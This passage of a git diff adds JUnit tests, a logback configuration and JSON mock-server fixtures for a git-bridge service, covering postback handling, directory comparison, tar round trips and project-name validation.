+ oneOf(dbStore).addURLIndexForProject(testProjectName, testUrl, oldTestPath); + } + }); + + ResourceCache resources = new UrlResourceCache(dbStore); + TemporaryFolder repositoryFolder = new TemporaryFolder(); + repositoryFolder.create(); + String repoStorePath = repositoryFolder.getRoot().getAbsolutePath(); + RepoStore repoStore = new FSGitRepoStore(repoStorePath, Optional.empty()); + ProjectRepo repo = repoStore.initRepo("repo"); + Map<String, RawFile> fileTable = repo.getDirectory().getFileTable(); + Map<String, byte[]> fetchedUrls = new HashMap<>(); + resources.get(testProjectName, testUrl, newTestPath, fileTable, fetchedUrls, Optional.empty()); + + // We don't bother caching in this case, at present. + assertEquals(0, fetchedUrls.size()); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/snapshot/push/PostbackManagerTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/snapshot/push/PostbackManagerTest.java new file mode 100644 index 0000000..fe2008c --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/snapshot/push/PostbackManagerTest.java @@ -0,0 +1,54 @@ +package uk.ac.ic.wlgitbridge.snapshot.push; + +import static org.junit.Assert.*; + +import org.junit.Assert; +import org.junit.Test; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.InternalErrorException; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.SnapshotPostException; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.UnexpectedPostbackException; + +/* + * Created by winston on 05/04/2016. + */ +public class PostbackManagerTest { + + private final PostbackManager postbackManager = new PostbackManager(); + + @Test + public void testRaceWithVersionId() throws UnexpectedPostbackException, SnapshotPostException { + String key = postbackManager.makeKeyForProject("proj"); + postbackManager.postVersionIDForProject("proj", 1, key); + int versionId = postbackManager.waitForVersionIdOrThrow("proj"); + assertEquals("Version id didn't match posted", 1, versionId); + } + + @Test + public void testRaceWithException() throws UnexpectedPostbackException, SnapshotPostException { + String key = postbackManager.makeKeyForProject("proj"); + InternalErrorException ex = new InternalErrorException(); + postbackManager.postExceptionForProject("proj", ex, key); + try { + postbackManager.waitForVersionIdOrThrow("proj"); + } catch (InternalErrorException e) { + Assert.assertSame("Wrong exception was thrown", ex, e); + return; + } + Assert.fail("Exception wasn't thrown as required"); + } + + @Test + public void testTableConsistency() throws UnexpectedPostbackException, SnapshotPostException { + String key1 = postbackManager.makeKeyForProject("proj1"); + assertEquals(1, postbackManager.postbackContentsTable.size()); + String key2 = postbackManager.makeKeyForProject("proj2"); + assertEquals(2, postbackManager.postbackContentsTable.size()); + postbackManager.postVersionIDForProject("proj1", 1, key1); + postbackManager.postVersionIDForProject("proj2", 1, key2); + assertEquals(2, postbackManager.postbackContentsTable.size()); + postbackManager.waitForVersionIdOrThrow("proj1"); + assertEquals(1, postbackManager.postbackContentsTable.size()); + postbackManager.waitForVersionIdOrThrow("proj2"); + Assert.assertTrue(postbackManager.postbackContentsTable.isEmpty()); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest.java new file 
mode 100644 index 0000000..532ccf7 --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest.java @@ -0,0 +1,130 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.util; + +import java.net.URISyntaxException; +import java.nio.file.Path; +import java.nio.file.Paths; +import org.junit.Assert; +import org.junit.Test; + +public class FileUtilTest { + + @Test + public void returnsTrueWhenFilesAreEqualInBothDirectories() throws URISyntaxException { + Path eq1 = + Paths.get( + getClass() + .getResource( + "/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenFilesAreEqualInBothDirectories/eq1") + .toURI()); + Path eq2 = + Paths.get( + getClass() + .getResource( + "/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenFilesAreEqualInBothDirectories/eq2") + .toURI()); + Assert.assertTrue(FileUtil.gitDirectoriesAreEqual(eq1, eq2)); + } + + @Test + public void returnsTrueWhenRecursiveFilesAreEqualInBothDirectories() throws URISyntaxException { + Path eq1 = + Paths.get( + getClass() + .getResource( + "/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenRecursiveFilesAreEqualInBothDirectories/eq1") + .toURI()); + Path eq2 = + Paths.get( + getClass() + .getResource( + "/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenRecursiveFilesAreEqualInBothDirectories/eq2") + .toURI()); + Assert.assertTrue(FileUtil.gitDirectoriesAreEqual(eq1, eq2)); + } + + @Test + public void returnsFalseWhenFilesAreNotEqualInBothDirectories() throws URISyntaxException { + Path neq1 = + Paths.get( + getClass() + .getResource( + "/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenFilesAreNotEqualInBothDirectories/neq1") + .toURI()); + Path neq2 = + Paths.get( + getClass() + .getResource( + "/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenFilesAreNotEqualInBothDirectories/neq2") + .toURI()); + Assert.assertFalse(FileUtil.gitDirectoriesAreEqual(neq1, neq2)); + } + + @Test + public void returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories() + throws URISyntaxException { + Path neq1 = + Paths.get( + getClass() + .getResource( + "/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories/neq1") + .toURI()); + Path neq2 = + Paths.get( + getClass() + .getResource( + "/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories/neq2") + .toURI()); + Assert.assertFalse(FileUtil.gitDirectoriesAreEqual(neq1, neq2)); + } + + @Test + public void returnsTrueEvenIfGitDirectoriesAreNotEqual() throws URISyntaxException { + Path neq1 = + Paths.get( + getClass() + .getResource( + "/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueEvenIfGitDirectoriesAreNotEqual/eq1") + .toURI()); + Path neq2 = + Paths.get( + getClass() + .getResource( + "/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueEvenIfGitDirectoriesAreNotEqual/eq2") + .toURI()); + Assert.assertTrue(FileUtil.gitDirectoriesAreEqual(neq1, neq2)); + } + + @Test + public void returnsFalseIfFileNamesAreNotEqual() throws URISyntaxException { + Path neq1 = + Paths.get( + getClass() + .getResource( + "/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfFileNamesAreNotEqual/neq1") + .toURI()); + Path neq2 = + Paths.get( + getClass() + .getResource( + 
"/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfFileNamesAreNotEqual/neq2") + .toURI()); + Assert.assertFalse(FileUtil.gitDirectoriesAreEqual(neq1, neq2)); + } + + @Test + public void returnsFalseIfInnerDirectoryNamesAreNotEqual() throws URISyntaxException { + Path neq1 = + Paths.get( + getClass() + .getResource( + "/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfInnerDirectoryNamesAreNotEqual/neq1") + .toURI()); + Path neq2 = + Paths.get( + getClass() + .getResource( + "/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfInnerDirectoryNamesAreNotEqual/neq2") + .toURI()); + Assert.assertFalse(FileUtil.gitDirectoriesAreEqual(neq1, neq2)); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/util/ProjectTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/util/ProjectTest.java new file mode 100644 index 0000000..ef17eda --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/util/ProjectTest.java @@ -0,0 +1,17 @@ +package uk.ac.ic.wlgitbridge.util; + +import org.junit.Assert; +import org.junit.Test; + +/* + * Created by winston on 23/08/2016. + */ +public class ProjectTest { + + @Test + public void testValidProjectNames() { + Assert.assertFalse(Project.isValidProjectName(null)); + Assert.assertFalse(Project.isValidProjectName("")); + Assert.assertFalse(Project.isValidProjectName(".wlgb")); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/util/TarTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/util/TarTest.java new file mode 100644 index 0000000..59c00d5 --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/util/TarTest.java @@ -0,0 +1,70 @@ +package uk.ac.ic.wlgitbridge.util; + +import static org.junit.Assert.assertTrue; + +import java.io.File; +import java.io.IOException; +import java.io.InputStream; +import org.junit.Before; +import org.junit.Test; +import org.junit.rules.TemporaryFolder; + +/* + * Created by winston on 23/08/2016. + */ +public class TarTest { + + private static final String RESOURCE_DIR = "/uk/ac/ic/wlgitbridge/util/TarTest"; + + private File testDir; + private File dirWithEmptyFile; + private File tmpDir; + + @Before + public void setup() throws IOException { + TemporaryFolder tmpFolder = new TemporaryFolder(); + tmpFolder.create(); + testDir = ResourceUtil.copyOfFolderResource(RESOURCE_DIR + "/testdir", tmpFolder::newFolder); + dirWithEmptyFile = + ResourceUtil.copyOfFolderResource( + RESOURCE_DIR + "/dir_with_empty_file", tmpFolder::newFolder); + tmpDir = tmpFolder.newFolder(); + } + + /* + * Compresses inputDir and decompresses to outputDir. Checks equality + * between outputDir and inputDir. + * @param inputDir the directory to compress + * @param outputDir the output directory. Must be empty. 
+ * @param compressFunction compression function + * @param decompressFunction decompression function + * @throws IOException + */ + private static void assertCompDecompEqual( + File inputDir, + File outputDir, + FunctionT<File, InputStream, IOException> compressFunction, + BiConsumerT<InputStream, File, IOException> decompressFunction) + throws IOException { + try (InputStream tarbz2 = compressFunction.apply(inputDir)) { + decompressFunction.accept(tarbz2, outputDir); + File unzipped = new File(outputDir, inputDir.getName()); + assertTrue(Files.contentsAreEqual(inputDir, unzipped)); + } + } + + @Test + public void tarAndUntarProducesTheSameResult() throws IOException { + assertCompDecompEqual(testDir, tmpDir, Tar::tar, Tar::untar); + } + + @Test + public void tarbz2AndUntarbz2ProducesTheSameResult() throws IOException { + assertCompDecompEqual(testDir, tmpDir, Tar.bz2::zip, Tar.bz2::unzip); + } + + @Test + public void tarbz2WorksOnDirectoriesWithAnEmptyFile() throws IOException { + assertCompDecompEqual(dirWithEmptyFile, tmpDir, Tar.bz2::zip, Tar.bz2::unzip); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/util/TimerUtilsTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/util/TimerUtilsTest.java new file mode 100644 index 0000000..892b9c1 --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/util/TimerUtilsTest.java @@ -0,0 +1,18 @@ +package uk.ac.ic.wlgitbridge.util; + +import static org.junit.Assert.assertEquals; + +import org.junit.Test; + +/* + * Created by winston on 23/08/2016. + */ +public class TimerUtilsTest { + + @Test + public void testMakeTimerTask() { + int[] iPtr = new int[] {3}; + TimerUtils.makeTimerTask(() -> iPtr[0] = 5).run(); + assertEquals(5, iPtr[0]); + } +} diff --git a/services/git-bridge/src/test/resources/logback-test.xml b/services/git-bridge/src/test/resources/logback-test.xml new file mode 100644 index 0000000..455a379 --- /dev/null +++ b/services/git-bridge/src/test/resources/logback-test.xml @@ -0,0 +1,17 @@ +<configuration> + <!-- Log everything (subject to logger and root levels set below) to stderr. --> + <appender name="stderr" class="ch.qos.logback.core.ConsoleAppender"> + <target>System.err</target> + <encoder> + <pattern>%d{yyyy-MM-dd HH:mm:ss.SSS} %-5level [%thread] %logger{0}: %msg%n</pattern> + </encoder> + </appender> + + <!-- Set log levels for the application (or parts of the application). --> + <logger name="uk.ac.ic.wlgitbridge" level="INFO" /> + + <!-- The root log level determines how much our dependencies put in the logs.
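For example, a single noisy dependency could be quieted further with a per-package override (the package name here is hypothetical): <logger name="some.noisy.dependency" level="ERROR" /> leaving the root level untouched.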
--> + <root level="WARN"> + <appender-ref ref="stderr" /> + </root> +</configuration> diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneAMigratedRepositoryWithoutChanges/state/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneAMigratedRepositoryWithoutChanges/state/000000000000000000000000/main.tex new file mode 100644 index 0000000..d670460 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneAMigratedRepositoryWithoutChanges/state/000000000000000000000000/main.tex @@ -0,0 +1 @@ +test content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneAMigratedRepositoryWithoutChanges/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneAMigratedRepositoryWithoutChanges/state/state.json new file mode 100644 index 0000000..4789afb --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneAMigratedRepositoryWithoutChanges/state/state.json @@ -0,0 +1,29 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 0, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [], + "getForVers": [ + { + "versionID": 0, + "srcs": [ + { + "content": "test content\n", + "path": "main.tex" + } + ], + "atts": [] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 1 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneARepository/state/000000000000000000000000/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneARepository/state/000000000000000000000000/foo/bar/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneARepository/state/000000000000000000000000/foo/bar/test.tex @@ -0,0 +1 @@ +This text is from another file. 
\ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneARepository/state/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneARepository/state/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneARepository/state/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneARepository/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneARepository/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png new file mode 100644 index 0000000..74e1fcd Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneARepository/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneARepository/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneARepository/state/state.json new file mode 100644 index 0000000..1990cf0 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneARepository/state/state.json @@ -0,0 +1,46 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.333Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3857/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/000000000000000000000000/overleaf-white-410-copy.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/000000000000000000000000/overleaf-white-410-copy.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and 
b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/000000000000000000000000/overleaf-white-410-copy.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/000000000000000000000000/overleaf-white-410.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/000000000000000000000000/overleaf-white-410.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/000000000000000000000000/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/000000000000000000000000/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/state.json new file mode 100644 index 0000000..593a965 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/state.json @@ -0,0 +1,50 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:4002/state/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410-copy.png" + }, + { + "url": "http://127.0.0.1:4002/state/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/111111111111111111111111/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/111111111111111111111111/foo/bar/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/111111111111111111111111/foo/bar/test.tex @@ -0,0 +1 @@ +This text is from another file. 
\ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/111111111111111111111111/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/111111111111111111111111/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/111111111111111111111111/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/111111111111111111111111/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/111111111111111111111111/overleaf-white-410.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/111111111111111111111111/overleaf-white-410.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/222222222222222222222222/editor-versions-a7e4de19d015c3e7477e3f7eaa6c418e.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/222222222222222222222222/editor-versions-a7e4de19d015c3e7477e3f7eaa6c418e.png new file mode 100644 index 0000000..7fa339b Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/222222222222222222222222/editor-versions-a7e4de19d015c3e7477e3f7eaa6c418e.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/222222222222222222222222/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/222222222222222222222222/foo/bar/test.tex new file mode 100644 index 0000000..1c05c01 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/222222222222222222222222/foo/bar/test.tex @@ -0,0 +1 @@ +a different one \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/222222222222222222222222/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/222222222222222222222222/main.tex new file mode 100644 index 0000000..802d4bb --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/222222222222222222222222/main.tex @@ -0,0 +1 @@ +different content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/state.json new file mode 100644 index 0000000..85b21f5 --- /dev/null +++ 
b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/state.json @@ -0,0 +1,90 @@ +[ + { + "project": "111111111111111111111111", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3858/state/111111111111111111111111/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + }, + { + "project": "222222222222222222222222", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "different content\n", + "path": "main.tex" + }, + { + "content": "a different one", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3858/state/222222222222222222222222/editor-versions-a7e4de19d015c3e7477e3f7eaa6c418e.png", + "path": "editor-versions-a7e4de19d015c3e7477e3f7eaa6c418e.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canMigrateRepository/state/000000000000000000000000/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canMigrateRepository/state/000000000000000000000000/foo/bar/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canMigrateRepository/state/000000000000000000000000/foo/bar/test.tex @@ -0,0 +1 @@ +This text is from another file. 
\ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canMigrateRepository/state/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canMigrateRepository/state/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canMigrateRepository/state/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canMigrateRepository/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canMigrateRepository/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png new file mode 100644 index 0000000..74e1fcd Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canMigrateRepository/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canMigrateRepository/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canMigrateRepository/state/state.json new file mode 100644 index 0000000..9e6ad36 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canMigrateRepository/state/state.json @@ -0,0 +1,83 @@ +[ + { + "project": "222222222222222222222222", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "migratedFromId": "000000000000000000000000" + }, + "getSavedVers": [], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3881/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + }, + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + 